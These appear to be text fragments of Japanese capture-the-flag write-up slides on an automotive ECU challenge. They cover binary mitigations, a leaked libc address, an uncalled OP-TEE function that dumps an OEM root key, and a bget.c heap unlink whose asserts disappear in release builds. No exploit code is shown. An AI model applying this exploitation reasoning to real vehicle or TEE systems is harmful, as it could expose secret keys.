libc puts @ 0xffff8256ebe0 Authentication token: • 配布物のrootfs.cpio.ubootを展開して探索すると、 /home/user/ecu_auth_daemonが見つかる cpio-root/home/user$ ls ecu_auth_daemon flag1 tz_gate ※tz_gateは後述。 RELRO STACK CANARY NX PIE RPATH Partial RELRO No canary found NX enabled No PIE No RPATH • バイナリの脆弱性緩和機能は、スタックカナリア無し、NX有効
TODO: Remove this before the final vehicle release!!! * Edit: Actually, it's not connected to the TA dispatcher, * so it's uncallable from the Normal World anyway. Safe to ignore. :) */ static TEE_Result debug_dump_oem_root_key(void *challenge, uint32_t len) { TEE_ObjectHandle object = TEE_HANDLE_NULL; TEE_ObjectInfo object_info; TEE_Result res; uint32_t read_bytes = 0; IMSG("[CRITICAL WARNING] Executing Factory Key Dump API!"); (略) • 呼べたら「勝ち」な関数は存在するが、どこからも呼ばれず、tz_gateからも呼び出せな い
/* The buffer is free. Remove it from the free list and add its size to that of our buffer. */ assert(BH((char *) bn + bn->bh.bsize)->prevfree == bn->bh.bsize); assert(bn->ql.blink->ql.flink == bn); assert(bn->ql.flink->ql.blink == bn); bn->ql.blink->ql.flink = bn->ql.flink; bn->ql.flink->ql.blink = bn->ql.blink; bget.cの繋ぎ替え箇所。assertはあるがリリースビルドで消える